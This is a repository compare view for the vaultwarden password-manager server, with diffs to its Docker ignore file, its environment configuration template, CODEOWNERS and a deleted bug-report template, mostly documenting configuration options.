mirror of
https://github.com/dani-garcia/vaultwarden.git
synced 2025-11-27 23:22:33 +02:00
Compare commits
242 Commits
1.30.5
...
2ac589d4b4
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
2ac589d4b4 | ||
|
|
b2e2aef7de | ||
|
|
0755bb19c0 | ||
|
|
fee0c1c711 | ||
|
|
f58539f0b4 | ||
|
|
e718afb441 | ||
|
|
55945ad793 | ||
|
|
4fd22d8e3b | ||
|
|
d6a8fb8e48 | ||
|
|
3b48e6e903 | ||
|
|
6b9333b33e | ||
|
|
a545636ee5 | ||
|
|
f125d5f1a1 | ||
|
|
ad75ce281e | ||
|
|
9059437c35 | ||
|
|
c84db0daca | ||
|
|
72adc239f5 | ||
|
|
34ebeeca76 | ||
|
|
0469d9ba4c | ||
|
|
eaa6ad06ed | ||
|
|
0d3f283c37 | ||
|
|
51a1d641c5 | ||
|
|
90f7e5ff80 | ||
|
|
200999c94e | ||
|
|
d363e647e9 | ||
|
|
53f58b14d5 | ||
|
|
ef7835d1b0 | ||
|
|
3a44dc963b | ||
|
|
a039e227c7 | ||
|
|
602b18fdd6 | ||
|
|
bf04c64759 | ||
|
|
2f1d86b7f1 | ||
|
|
ff97bcfdda | ||
|
|
73f2441d1a | ||
|
|
ad8484a2d5 | ||
|
|
9813e480c0 | ||
|
|
bfe172702a | ||
|
|
df42b6d6b0 | ||
|
|
2697fe8aba | ||
|
|
674e444d67 | ||
|
|
0d16da440d | ||
|
|
66cf179bca | ||
|
|
025bb90f8f | ||
|
|
d5039d9c17 | ||
|
|
e7c796a660 | ||
|
|
bbbd2f6d15 | ||
|
|
a2d7895586 | ||
|
|
8a0cb1137e | ||
|
|
f960bf59bb | ||
|
|
3a1f1bae00 | ||
|
|
8dfe805954 | ||
|
|
07b869b3ef | ||
|
|
2a18665288 | ||
|
|
71952a4ab5 | ||
|
|
994d157064 | ||
|
|
1dae6093c9 | ||
|
|
6edceb5f7a | ||
|
|
359a4a088a | ||
|
|
3baffeee9a | ||
|
|
d5c353427d | ||
|
|
1f868b8d22 | ||
|
|
8d1df08b81 | ||
|
|
3b6bccde97 | ||
|
|
d2b36642a6 | ||
|
|
a02fb0fd24 | ||
|
|
1109293992 | ||
|
|
3c29f82974 | ||
|
|
663f88e717 | ||
|
|
a3dccee243 | ||
|
|
c0ebe0d982 | ||
|
|
1b46c80389 | ||
|
|
2c549984c0 | ||
|
|
ecab7a50ea | ||
|
|
2903a3a13a | ||
|
|
952992c85b | ||
|
|
c0be36a17f | ||
|
|
d1dee04615 | ||
|
|
ef2695de0c | ||
|
|
29f2b433f0 | ||
|
|
07f80346b4 | ||
|
|
4f68eafa3e | ||
|
|
327d369188 | ||
|
|
ca7483df85 | ||
|
|
16b6d2a71e | ||
|
|
871a3f214a | ||
|
|
10d12676cf | ||
|
|
dec3a9603a | ||
|
|
86aaf27659 | ||
|
|
bc913d1156 | ||
|
|
ef4bff09eb | ||
|
|
4816f77fd7 | ||
|
|
dfd9e65396 | ||
|
|
b1481c7c1a | ||
|
|
d9e0d68f20 | ||
|
|
08183fc999 | ||
|
|
d9b043d32c | ||
|
|
ed4ad67e73 | ||
|
|
a523c82f5f | ||
|
|
4d6d3443ae | ||
|
|
9cd400db6c | ||
|
|
fd51230044 | ||
|
|
45e5f06b86 | ||
|
|
620ad92331 | ||
|
|
c9860af11c | ||
|
|
d7adce97df | ||
|
|
71b3d3c818 | ||
|
|
da3701c0cf | ||
|
|
96813b1317 | ||
|
|
b0b953f348 | ||
|
|
cdfdc6ff4f | ||
|
|
2393c3f3c0 | ||
|
|
0d16b38a68 | ||
|
|
ff33534c07 | ||
|
|
adb21d5c1a | ||
|
|
e927b8aa5e | ||
|
|
ba48ca68fc | ||
|
|
294b429436 | ||
|
|
37c14c3c69 | ||
|
|
d0581da638 | ||
|
|
38aad4f7be | ||
|
|
20d9e885bf | ||
|
|
2f20ad86f9 | ||
|
|
33bae5fbe9 | ||
|
|
f60502a17e | ||
|
|
13f4b66e62 | ||
|
|
c967d0ddc1 | ||
|
|
ae6ed0ece8 | ||
|
|
b7c254eb30 | ||
|
|
a47b484172 | ||
|
|
65629a99f0 | ||
|
|
49c5dec9b6 | ||
|
|
cd195ff243 | ||
|
|
e3541763fd | ||
|
|
f0efec7c96 | ||
|
|
040e2a7bb0 | ||
|
|
d184c8f08c | ||
|
|
7d6dec6413 | ||
|
|
de01111082 | ||
|
|
0bd8f607cb | ||
|
|
21efc0800d | ||
|
|
1031c2e286 | ||
|
|
1bf85201e7 | ||
|
|
6ceed9284d | ||
|
|
25d99e3506 | ||
|
|
dca14285fd | ||
|
|
66baa5e7d8 | ||
|
|
248e561b3f | ||
|
|
55623ad9c6 | ||
|
|
e9acd8bd3c | ||
|
|
544b7229e8 | ||
|
|
978f009293 | ||
|
|
92f1530e96 | ||
|
|
2b824e8096 | ||
|
|
059661be48 | ||
|
|
0f3f97cc76 | ||
|
|
aa0fe7785a | ||
|
|
65d11a9720 | ||
|
|
c722006385 | ||
|
|
aaab7f9640 | ||
|
|
cbdb5657f1 | ||
|
|
669b9db758 | ||
|
|
3466a8040e | ||
|
|
7d47155d83 | ||
|
|
9e26014b4d | ||
|
|
339612c917 | ||
|
|
9eebbf3b9f | ||
|
|
b557c11724 | ||
|
|
a1204cc935 | ||
|
|
1ea511cbfc | ||
|
|
2e6a6fa39f | ||
|
|
e7d5c17ff7 | ||
|
|
a7be8fab9b | ||
|
|
39d4d31080 | ||
|
|
c28246cf34 | ||
|
|
d7df0ad79e | ||
|
|
7c8ba0c232 | ||
|
|
d335187172 | ||
|
|
f858523d92 | ||
|
|
529c39c6c5 | ||
|
|
b428481ac0 | ||
|
|
b4b2701905 | ||
|
|
de66e56b6c | ||
|
|
ecfebaf3c7 | ||
|
|
0e53f58288 | ||
|
|
bc7ceb2ee3 | ||
|
|
b27e6e30c9 | ||
|
|
505b30eec2 | ||
|
|
54bfcb8bc3 | ||
|
|
035f694d2f | ||
|
|
a4ab014ade | ||
|
|
6fedfceaa9 | ||
|
|
8e8483481f | ||
|
|
d04b94b77d | ||
|
|
247d0706ff | ||
|
|
0e8b410798 | ||
|
|
fda77afc2a | ||
|
|
d9835f530c | ||
|
|
bd91964170 | ||
|
|
d42b264a93 | ||
|
|
a4c7fadbf4 | ||
|
|
8e2a87fd79 | ||
|
|
4233dbf3db | ||
|
|
a2bf8def2a | ||
|
|
8f05a90b96 | ||
|
|
9082e7cebb | ||
|
|
55fdee3bf8 | ||
|
|
377969ea67 | ||
|
|
f05398a6b3 | ||
|
|
9555ac7bb8 | ||
|
|
f01ef40a8e | ||
|
|
8e7b27cc36 | ||
|
|
d230ee087c | ||
|
|
f8f14727b9 | ||
|
|
753a9e0bae | ||
|
|
f5fb69b64f | ||
|
|
3261534438 | ||
|
|
46762d9fde | ||
|
|
6cadb2627a | ||
|
|
0fe93edea6 | ||
|
|
e9aa5a545e | ||
|
|
9dcc738f85 | ||
|
|
84a7c7da5d | ||
|
|
ca9234ed86 | ||
|
|
27dc67fadd | ||
|
|
2ad33ec97f | ||
|
|
e1a8df96db | ||
|
|
e42a37c6c1 | ||
|
|
129b835ac7 | ||
|
|
2d98aa3045 | ||
|
|
93636eb3c3 | ||
|
|
1e42755187 | ||
|
|
ce8efcc48f | ||
|
|
79ce5b49bc | ||
|
|
7c3cad197c | ||
|
|
000c606029 | ||
|
|
29144b2ce0 | ||
|
|
ea04b6f151 | ||
|
|
3427217686 | ||
|
|
a1fbd6d729 | ||
|
|
2cbfe6fa5b | ||
|
|
d86c4f2c23 | ||
|
|
6d73f30b4f |
@@ -1,40 +1,16 @@
|
|||||||
# Local build artifacts
|
// Ignore everything
|
||||||
target
|
*
|
||||||
|
|
||||||
# Data folder
|
// Allow what is needed
|
||||||
data
|
!.git
|
||||||
|
|
||||||
# Misc
|
|
||||||
.env
|
|
||||||
.env.template
|
|
||||||
.gitattributes
|
|
||||||
.gitignore
|
|
||||||
rustfmt.toml
|
|
||||||
|
|
||||||
# IDE files
|
|
||||||
.vscode
|
|
||||||
.idea
|
|
||||||
.editorconfig
|
|
||||||
*.iml
|
|
||||||
|
|
||||||
# Documentation
|
|
||||||
.github
|
|
||||||
*.md
|
|
||||||
*.txt
|
|
||||||
*.yml
|
|
||||||
*.yaml
|
|
||||||
|
|
||||||
# Docker
|
|
||||||
hooks
|
|
||||||
tools
|
|
||||||
Dockerfile
|
|
||||||
.dockerignore
|
|
||||||
docker/**
|
|
||||||
!docker/healthcheck.sh
|
!docker/healthcheck.sh
|
||||||
!docker/start.sh
|
!docker/start.sh
|
||||||
|
!macros
|
||||||
|
!migrations
|
||||||
|
!src
|
||||||
|
|
||||||
# Web vault
|
!build.rs
|
||||||
web-vault
|
!Cargo.lock
|
||||||
|
!Cargo.toml
|
||||||
# Vaultwarden Resources
|
!rustfmt.toml
|
||||||
resources
|
!rust-toolchain.toml
|
||||||
|
|||||||
127
.env.template
127
.env.template
@@ -15,6 +15,14 @@
|
|||||||
####################
|
####################
|
||||||
|
|
||||||
## Main data folder
|
## Main data folder
|
||||||
|
## This can be a path to local folder or a path to an external location
|
||||||
|
## depending on features enabled at build time. Possible external locations:
|
||||||
|
##
|
||||||
|
## - AWS S3 Bucket (via `s3` feature): s3://bucket-name/path/to/folder
|
||||||
|
##
|
||||||
|
## When using an external location, make sure to set TMP_FOLDER,
|
||||||
|
## TEMPLATES_FOLDER, and DATABASE_URL to local paths and/or a remote database
|
||||||
|
## location.
|
||||||
# DATA_FOLDER=data
|
# DATA_FOLDER=data
|
||||||
|
|
||||||
## Individual folders, these override %DATA_FOLDER%
|
## Individual folders, these override %DATA_FOLDER%
|
||||||
@@ -22,10 +30,13 @@
|
|||||||
# ICON_CACHE_FOLDER=data/icon_cache
|
# ICON_CACHE_FOLDER=data/icon_cache
|
||||||
# ATTACHMENTS_FOLDER=data/attachments
|
# ATTACHMENTS_FOLDER=data/attachments
|
||||||
# SENDS_FOLDER=data/sends
|
# SENDS_FOLDER=data/sends
|
||||||
|
|
||||||
|
## Temporary folder used for storing temporary file uploads
|
||||||
|
## Must be a local path.
|
||||||
# TMP_FOLDER=data/tmp
|
# TMP_FOLDER=data/tmp
|
||||||
|
|
||||||
## Templates data folder, by default uses embedded templates
|
## HTML template overrides data folder
|
||||||
## Check source code to see the format
|
## Must be a local path.
|
||||||
# TEMPLATES_FOLDER=data/templates
|
# TEMPLATES_FOLDER=data/templates
|
||||||
## Automatically reload the templates for every request, slow, use only for development
|
## Automatically reload the templates for every request, slow, use only for development
|
||||||
# RELOAD_TEMPLATES=false
|
# RELOAD_TEMPLATES=false
|
||||||
@@ -39,7 +50,9 @@
|
|||||||
#########################
|
#########################
|
||||||
|
|
||||||
## Database URL
|
## Database URL
|
||||||
## When using SQLite, this is the path to the DB file, default to %DATA_FOLDER%/db.sqlite3
|
## When using SQLite, this is the path to the DB file, and it defaults to
|
||||||
|
## %DATA_FOLDER%/db.sqlite3. If DATA_FOLDER is set to an external location, this
|
||||||
|
## must be set to a local sqlite3 file path.
|
||||||
# DATABASE_URL=data/db.sqlite3
|
# DATABASE_URL=data/db.sqlite3
|
||||||
## When using MySQL, specify an appropriate connection URI.
|
## When using MySQL, specify an appropriate connection URI.
|
||||||
## Details: https://docs.diesel.rs/2.1.x/diesel/mysql/struct.MysqlConnection.html
|
## Details: https://docs.diesel.rs/2.1.x/diesel/mysql/struct.MysqlConnection.html
|
||||||
@@ -84,27 +97,28 @@
|
|||||||
### WebSocket ###
|
### WebSocket ###
|
||||||
#################
|
#################
|
||||||
|
|
||||||
## Enables websocket notifications
|
## Enable websocket notifications
|
||||||
# WEBSOCKET_ENABLED=false
|
# ENABLE_WEBSOCKET=true
|
||||||
|
|
||||||
## Controls the WebSocket server address and port
|
|
||||||
# WEBSOCKET_ADDRESS=0.0.0.0
|
|
||||||
# WEBSOCKET_PORT=3012
|
|
||||||
|
|
||||||
##########################
|
##########################
|
||||||
### Push notifications ###
|
### Push notifications ###
|
||||||
##########################
|
##########################
|
||||||
|
|
||||||
## Enables push notifications (requires key and id from https://bitwarden.com/host)
|
## Enables push notifications (requires key and id from https://bitwarden.com/host)
|
||||||
## If you choose "European Union" Data Region, uncomment PUSH_RELAY_URI and PUSH_IDENTITY_URI then replace .com by .eu
|
|
||||||
## Details about mobile client push notification:
|
## Details about mobile client push notification:
|
||||||
## - https://github.com/dani-garcia/vaultwarden/wiki/Enabling-Mobile-Client-push-notification
|
## - https://github.com/dani-garcia/vaultwarden/wiki/Enabling-Mobile-Client-push-notification
|
||||||
# PUSH_ENABLED=false
|
# PUSH_ENABLED=false
|
||||||
# PUSH_INSTALLATION_ID=CHANGEME
|
# PUSH_INSTALLATION_ID=CHANGEME
|
||||||
# PUSH_INSTALLATION_KEY=CHANGEME
|
# PUSH_INSTALLATION_KEY=CHANGEME
|
||||||
## Don't change this unless you know what you're doing.
|
|
||||||
|
# WARNING: Do not modify the following settings unless you fully understand their implications!
|
||||||
|
# Default Push Relay and Identity URIs
|
||||||
# PUSH_RELAY_URI=https://push.bitwarden.com
|
# PUSH_RELAY_URI=https://push.bitwarden.com
|
||||||
# PUSH_IDENTITY_URI=https://identity.bitwarden.com
|
# PUSH_IDENTITY_URI=https://identity.bitwarden.com
|
||||||
|
# European Union Data Region Settings
|
||||||
|
# If you have selected "European Union" as your data region, use the following URIs instead.
|
||||||
|
# PUSH_RELAY_URI=https://api.bitwarden.eu
|
||||||
|
# PUSH_IDENTITY_URI=https://identity.bitwarden.eu
|
||||||
|
|
||||||
#####################
|
#####################
|
||||||
### Schedule jobs ###
|
### Schedule jobs ###
|
||||||
@@ -116,7 +130,7 @@
|
|||||||
## and are always in terms of UTC time (regardless of your local time zone settings).
|
## and are always in terms of UTC time (regardless of your local time zone settings).
|
||||||
##
|
##
|
||||||
## The schedule format is a bit different from crontab as crontab does not contains seconds.
|
## The schedule format is a bit different from crontab as crontab does not contains seconds.
|
||||||
## You can test the the format here: https://crontab.guru, but remove the first digit!
|
## You can test the format here: https://crontab.guru, but remove the first digit!
|
||||||
## SEC MIN HOUR DAY OF MONTH MONTH DAY OF WEEK
|
## SEC MIN HOUR DAY OF MONTH MONTH DAY OF WEEK
|
||||||
## "0 30 9,12,15 1,15 May-Aug Mon,Wed,Fri"
|
## "0 30 9,12,15 1,15 May-Aug Mon,Wed,Fri"
|
||||||
## "0 30 * * * * "
|
## "0 30 * * * * "
|
||||||
@@ -156,6 +170,10 @@
|
|||||||
## Cron schedule of the job that cleans old auth requests from the auth request.
|
## Cron schedule of the job that cleans old auth requests from the auth request.
|
||||||
## Defaults to every minute. Set blank to disable this job.
|
## Defaults to every minute. Set blank to disable this job.
|
||||||
# AUTH_REQUEST_PURGE_SCHEDULE="30 * * * * *"
|
# AUTH_REQUEST_PURGE_SCHEDULE="30 * * * * *"
|
||||||
|
##
|
||||||
|
## Cron schedule of the job that cleans expired Duo contexts from the database. Does nothing if Duo MFA is disabled or set to use the legacy iframe prompt.
|
||||||
|
## Defaults to every minute. Set blank to disable this job.
|
||||||
|
# DUO_CONTEXT_PURGE_SCHEDULE="30 * * * * *"
|
||||||
|
|
||||||
########################
|
########################
|
||||||
### General settings ###
|
### General settings ###
|
||||||
@@ -224,7 +242,8 @@
|
|||||||
# SIGNUPS_ALLOWED=true
|
# SIGNUPS_ALLOWED=true
|
||||||
|
|
||||||
## Controls if new users need to verify their email address upon registration
|
## Controls if new users need to verify their email address upon registration
|
||||||
## Note that setting this option to true prevents logins until the email address has been verified!
|
## On new client versions, this will require the user to verify their email at signup time.
|
||||||
|
## On older clients, it will require the user to verify their email before they can log in.
|
||||||
## The welcome email will include a verification link, and login attempts will periodically
|
## The welcome email will include a verification link, and login attempts will periodically
|
||||||
## trigger another verification email to be sent.
|
## trigger another verification email to be sent.
|
||||||
# SIGNUPS_VERIFY=false
|
# SIGNUPS_VERIFY=false
|
||||||
@@ -254,7 +273,7 @@
|
|||||||
## A comma-separated list means only those users can create orgs:
|
## A comma-separated list means only those users can create orgs:
|
||||||
# ORG_CREATION_USERS=admin1@example.com,admin2@example.com
|
# ORG_CREATION_USERS=admin1@example.com,admin2@example.com
|
||||||
|
|
||||||
## Invitations org admins to invite users, even when signups are disabled
|
## Allows org admins to invite users, even when signups are disabled
|
||||||
# INVITATIONS_ALLOWED=true
|
# INVITATIONS_ALLOWED=true
|
||||||
## Name shown in the invitation emails that don't come from a specific organization
|
## Name shown in the invitation emails that don't come from a specific organization
|
||||||
# INVITATION_ORG_NAME=Vaultwarden
|
# INVITATION_ORG_NAME=Vaultwarden
|
||||||
@@ -275,12 +294,13 @@
|
|||||||
## The default for new users. If changed, it will be updated during login for existing users.
|
## The default for new users. If changed, it will be updated during login for existing users.
|
||||||
# PASSWORD_ITERATIONS=600000
|
# PASSWORD_ITERATIONS=600000
|
||||||
|
|
||||||
## Controls whether users can set password hints. This setting applies globally to all users.
|
## Controls whether users can set or show password hints. This setting applies globally to all users.
|
||||||
# PASSWORD_HINTS_ALLOWED=true
|
# PASSWORD_HINTS_ALLOWED=true
|
||||||
|
|
||||||
## Controls whether a password hint should be shown directly in the web page if
|
## Controls whether a password hint should be shown directly in the web page if
|
||||||
## SMTP service is not configured. Not recommended for publicly-accessible instances
|
## SMTP service is not configured and password hints are allowed.
|
||||||
## as this provides unauthenticated access to potentially sensitive data.
|
## Not recommended for publicly-accessible instances because this provides
|
||||||
|
## unauthenticated access to potentially sensitive data.
|
||||||
# SHOW_PASSWORD_HINT=false
|
# SHOW_PASSWORD_HINT=false
|
||||||
|
|
||||||
#########################
|
#########################
|
||||||
@@ -321,28 +341,33 @@
|
|||||||
|
|
||||||
## Icon download timeout
|
## Icon download timeout
|
||||||
## Configure the timeout value when downloading the favicons.
|
## Configure the timeout value when downloading the favicons.
|
||||||
## The default is 10 seconds, but this could be to low on slower network connections
|
## The default is 10 seconds, but this could be too low on slower network connections
|
||||||
# ICON_DOWNLOAD_TIMEOUT=10
|
# ICON_DOWNLOAD_TIMEOUT=10
|
||||||
|
|
||||||
## Icon blacklist Regex
|
## Block HTTP domains/IPs by Regex
|
||||||
## Any domains or IPs that match this regex won't be fetched by the icon service.
|
## Any domains or IPs that match this regex won't be fetched by the internal HTTP client.
|
||||||
## Useful to hide other servers in the local network. Check the WIKI for more details
|
## Useful to hide other servers in the local network. Check the WIKI for more details
|
||||||
## NOTE: Always enclose this regex withing single quotes!
|
## NOTE: Always enclose this regex within single quotes!
|
||||||
# ICON_BLACKLIST_REGEX='^(192\.168\.0\.[0-9]+|192\.168\.1\.[0-9]+)$'
|
# HTTP_REQUEST_BLOCK_REGEX='^(192\.168\.0\.[0-9]+|192\.168\.1\.[0-9]+)$'
|
||||||
|
|
||||||
## Any IP which is not defined as a global IP will be blacklisted.
|
## Enabling this will cause the internal HTTP client to refuse to connect to any non-global IP address.
|
||||||
## Useful to secure your internal environment: See https://en.wikipedia.org/wiki/Reserved_IP_addresses for a list of IPs which it will block
|
## Useful to secure your internal environment: See https://en.wikipedia.org/wiki/Reserved_IP_addresses for a list of IPs which it will block
|
||||||
# ICON_BLACKLIST_NON_GLOBAL_IPS=true
|
# HTTP_REQUEST_BLOCK_NON_GLOBAL_IPS=true
|
||||||
|
|
||||||
## Client Settings
|
## Client Settings
|
||||||
## Enable experimental feature flags for clients.
|
## Enable experimental feature flags for clients.
|
||||||
## This is a comma-separated list of flags, e.g. "flag1,flag2,flag3".
|
## This is a comma-separated list of flags, e.g. "flag1,flag2,flag3".
|
||||||
|
## Note that clients cache the /api/config endpoint for about 1 hour and it could take some time before they are enabled or disabled!
|
||||||
##
|
##
|
||||||
## The following flags are available:
|
## The following flags are available:
|
||||||
## - "autofill-overlay": Add an overlay menu to form fields for quick access to credentials.
|
## - "inline-menu-positioning-improvements": Enable the use of inline menu password generator and identity suggestions in the browser extension.
|
||||||
## - "autofill-v2": Use the new autofill implementation.
|
## - "inline-menu-totp": Enable the use of inline menu TOTP codes in the browser extension.
|
||||||
## - "browser-fileless-import": Directly import credentials from other providers without a file.
|
## - "ssh-agent": Enable SSH agent support on Desktop. (Needs desktop >=2024.12.0)
|
||||||
## - "fido2-vault-credentials": Enable the use of FIDO2 security keys as second factor.
|
## - "ssh-key-vault-item": Enable the creation and use of SSH key vault items. (Needs clients >=2024.12.0)
|
||||||
|
## - "export-attachments": Enable support for exporting attachments (Clients >=2025.4.0)
|
||||||
|
## - "anon-addy-self-host-alias": Enable configuring self-hosted Anon Addy alias generator. (Needs Android >=2025.3.0, iOS >=2025.4.0)
|
||||||
|
## - "simple-login-self-host-alias": Enable configuring self-hosted Simple Login alias generator. (Needs Android >=2025.3.0, iOS >=2025.4.0)
|
||||||
|
## - "mutual-tls": Enable the use of mutual TLS on Android (Client >= 2025.2.0)
|
||||||
# EXPERIMENTAL_CLIENT_FEATURE_FLAGS=fido2-vault-credentials
|
# EXPERIMENTAL_CLIENT_FEATURE_FLAGS=fido2-vault-credentials
|
||||||
|
|
||||||
## Require new device emails. When a user logs in an email is required to be sent.
|
## Require new device emails. When a user logs in an email is required to be sent.
|
||||||
@@ -366,8 +391,9 @@
|
|||||||
## Log level
|
## Log level
|
||||||
## Change the verbosity of the log output
|
## Change the verbosity of the log output
|
||||||
## Valid values are "trace", "debug", "info", "warn", "error" and "off"
|
## Valid values are "trace", "debug", "info", "warn", "error" and "off"
|
||||||
## Setting it to "trace" or "debug" would also show logs for mounted
|
## Setting it to "trace" or "debug" would also show logs for mounted routes and static file, websocket and alive requests
|
||||||
## routes and static file, websocket and alive requests
|
## For a specific module append a comma separated `path::to::module=log_level`
|
||||||
|
## For example, to only see debug logs for icons use: LOG_LEVEL="info,vaultwarden::api::icons=debug"
|
||||||
# LOG_LEVEL=info
|
# LOG_LEVEL=info
|
||||||
|
|
||||||
## Token for the admin interface, preferably an Argon2 PCH string
|
## Token for the admin interface, preferably an Argon2 PCH string
|
||||||
@@ -400,6 +426,14 @@
|
|||||||
## Multiple values must be separated with a whitespace.
|
## Multiple values must be separated with a whitespace.
|
||||||
# ALLOWED_IFRAME_ANCESTORS=
|
# ALLOWED_IFRAME_ANCESTORS=
|
||||||
|
|
||||||
|
## Allowed connect-src (Know the risks!)
|
||||||
|
## https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/connect-src
|
||||||
|
## Allows other domains to URLs which can be loaded using script interfaces like the Forwarded email alias feature
|
||||||
|
## This adds the configured value to the 'Content-Security-Policy' headers 'connect-src' value.
|
||||||
|
## Multiple values must be separated with a whitespace. And only HTTPS values are allowed.
|
||||||
|
## Example: "https://my-addy-io.domain.tld https://my-simplelogin.domain.tld"
|
||||||
|
# ALLOWED_CONNECT_SRC=""
|
||||||
|
|
||||||
## Number of seconds, on average, between login requests from the same IP address before rate limiting kicks in.
|
## Number of seconds, on average, between login requests from the same IP address before rate limiting kicks in.
|
||||||
# LOGIN_RATELIMIT_SECONDS=60
|
# LOGIN_RATELIMIT_SECONDS=60
|
||||||
## Allow a burst of requests of up to this size, while maintaining the average indicated by `LOGIN_RATELIMIT_SECONDS`.
|
## Allow a burst of requests of up to this size, while maintaining the average indicated by `LOGIN_RATELIMIT_SECONDS`.
|
||||||
@@ -413,6 +447,18 @@
|
|||||||
## KNOW WHAT YOU ARE DOING!
|
## KNOW WHAT YOU ARE DOING!
|
||||||
# ORG_GROUPS_ENABLED=false
|
# ORG_GROUPS_ENABLED=false
|
||||||
|
|
||||||
|
## Increase secure note size limit (Know the risks!)
|
||||||
|
## Sets the secure note size limit to 100_000 instead of the default 10_000.
|
||||||
|
## WARNING: This could cause issues with clients. Also exports will not work on Bitwarden servers!
|
||||||
|
## KNOW WHAT YOU ARE DOING!
|
||||||
|
# INCREASE_NOTE_SIZE_LIMIT=false
|
||||||
|
|
||||||
|
## Enforce Single Org with Reset Password Policy
|
||||||
|
## Enforce that the Single Org policy is enabled before setting the Reset Password policy
|
||||||
|
## Bitwarden enforces this by default. In Vaultwarden we encouraged to use multiple organizations because groups were not available.
|
||||||
|
## Setting this to true will enforce the Single Org Policy to be enabled before you can enable the Reset Password policy.
|
||||||
|
# ENFORCE_SINGLE_ORG_WITH_RESET_PW_POLICY=false
|
||||||
|
|
||||||
########################
|
########################
|
||||||
### MFA/2FA settings ###
|
### MFA/2FA settings ###
|
||||||
########################
|
########################
|
||||||
@@ -426,15 +472,21 @@
|
|||||||
# YUBICO_SERVER=http://yourdomain.com/wsapi/2.0/verify
|
# YUBICO_SERVER=http://yourdomain.com/wsapi/2.0/verify
|
||||||
|
|
||||||
## Duo Settings
|
## Duo Settings
|
||||||
## You need to configure all options to enable global Duo support, otherwise users would need to configure it themselves
|
## You need to configure the DUO_IKEY, DUO_SKEY, and DUO_HOST options to enable global Duo support.
|
||||||
|
## Otherwise users will need to configure it themselves.
|
||||||
## Create an account and protect an application as mentioned in this link (only the first step, not the rest):
|
## Create an account and protect an application as mentioned in this link (only the first step, not the rest):
|
||||||
## https://help.bitwarden.com/article/setup-two-step-login-duo/#create-a-duo-security-account
|
## https://help.bitwarden.com/article/setup-two-step-login-duo/#create-a-duo-security-account
|
||||||
## Then set the following options, based on the values obtained from the last step:
|
## Then set the following options, based on the values obtained from the last step:
|
||||||
# DUO_IKEY=<Integration Key>
|
# DUO_IKEY=<Client ID>
|
||||||
# DUO_SKEY=<Secret Key>
|
# DUO_SKEY=<Client Secret>
|
||||||
# DUO_HOST=<API Hostname>
|
# DUO_HOST=<API Hostname>
|
||||||
## After that, you should be able to follow the rest of the guide linked above,
|
## After that, you should be able to follow the rest of the guide linked above,
|
||||||
## ignoring the fields that ask for the values that you already configured beforehand.
|
## ignoring the fields that ask for the values that you already configured beforehand.
|
||||||
|
##
|
||||||
|
## If you want to attempt to use Duo's 'Traditional Prompt' (deprecated, iframe based) set DUO_USE_IFRAME to 'true'.
|
||||||
|
## Duo no longer supports this, but it still works for some integrations.
|
||||||
|
## If you aren't sure, leave this alone.
|
||||||
|
# DUO_USE_IFRAME=false
|
||||||
|
|
||||||
## Email 2FA settings
|
## Email 2FA settings
|
||||||
## Email token size
|
## Email token size
|
||||||
@@ -448,6 +500,11 @@
|
|||||||
##
|
##
|
||||||
## Maximum attempts before an email token is reset and a new email will need to be sent.
|
## Maximum attempts before an email token is reset and a new email will need to be sent.
|
||||||
# EMAIL_ATTEMPTS_LIMIT=3
|
# EMAIL_ATTEMPTS_LIMIT=3
|
||||||
|
##
|
||||||
|
## Setup email 2FA on registration regardless of any organization policy
|
||||||
|
# EMAIL_2FA_ENFORCE_ON_VERIFIED_INVITE=false
|
||||||
|
## Automatically setup email 2FA as fallback provider when needed
|
||||||
|
# EMAIL_2FA_AUTO_FALLBACK=false
|
||||||
|
|
||||||
## Other MFA/2FA settings
|
## Other MFA/2FA settings
|
||||||
## Disable 2FA remember
|
## Disable 2FA remember
|
||||||
@@ -524,9 +581,9 @@
|
|||||||
## Only use this as a last resort if you are not able to use a valid certificate.
|
## Only use this as a last resort if you are not able to use a valid certificate.
|
||||||
# SMTP_ACCEPT_INVALID_HOSTNAMES=false
|
# SMTP_ACCEPT_INVALID_HOSTNAMES=false
|
||||||
|
|
||||||
##########################
|
#######################
|
||||||
### Rocket settings ###
|
### Rocket settings ###
|
||||||
##########################
|
#######################
|
||||||
|
|
||||||
## Rocket specific settings
|
## Rocket specific settings
|
||||||
## See https://rocket.rs/v0.5/guide/configuration/ for more details.
|
## See https://rocket.rs/v0.5/guide/configuration/ for more details.
|
||||||
|
|||||||
3
.github/CODEOWNERS
vendored
3
.github/CODEOWNERS
vendored
@@ -1,3 +1,6 @@
|
|||||||
/.github @dani-garcia @BlackDex
|
/.github @dani-garcia @BlackDex
|
||||||
|
/.github/** @dani-garcia @BlackDex
|
||||||
/.github/CODEOWNERS @dani-garcia @BlackDex
|
/.github/CODEOWNERS @dani-garcia @BlackDex
|
||||||
|
/.github/ISSUE_TEMPLATE/** @dani-garcia @BlackDex
|
||||||
/.github/workflows/** @dani-garcia @BlackDex
|
/.github/workflows/** @dani-garcia @BlackDex
|
||||||
|
/SECURITY.md @dani-garcia @BlackDex
|
||||||
|
|||||||
66
.github/ISSUE_TEMPLATE/bug_report.md
vendored
66
.github/ISSUE_TEMPLATE/bug_report.md
vendored
@@ -1,66 +0,0 @@
|
|||||||
---
|
|
||||||
name: Bug report
|
|
||||||
about: Use this ONLY for bugs in vaultwarden itself. Use the Discourse forum (link below) to request features or get help with usage/configuration. If in doubt, use the forum.
|
|
||||||
title: ''
|
|
||||||
labels: ''
|
|
||||||
assignees: ''
|
|
||||||
|
|
||||||
---
|
|
||||||
<!--
|
|
||||||
# ###
|
|
||||||
NOTE: Please update to the latest version of vaultwarden before reporting an issue!
|
|
||||||
This saves you and us a lot of time and troubleshooting.
|
|
||||||
See:
|
|
||||||
* https://github.com/dani-garcia/vaultwarden/issues/1180
|
|
||||||
* https://github.com/dani-garcia/vaultwarden/wiki/Updating-the-vaultwarden-image
|
|
||||||
# ###
|
|
||||||
-->
|
|
||||||
|
|
||||||
<!--
|
|
||||||
Please fill out the following template to make solving your problem easier and faster for us.
|
|
||||||
This is only a guideline. If you think that parts are unnecessary for your issue, feel free to remove them.
|
|
||||||
|
|
||||||
Remember to hide/redact personal or confidential information,
|
|
||||||
such as passwords, IP addresses, and DNS names as appropriate.
|
|
||||||
-->
|
|
||||||
|
|
||||||
### Subject of the issue
|
|
||||||
<!-- Describe your issue here. -->
|
|
||||||
|
|
||||||
### Deployment environment
|
|
||||||
|
|
||||||
<!--
|
|
||||||
=========================================================================================
|
|
||||||
Preferably, use the `Generate Support String` button on the admin page's Diagnostics tab.
|
|
||||||
That will auto-generate most of the info requested in this section.
|
|
||||||
=========================================================================================
|
|
||||||
-->
|
|
||||||
|
|
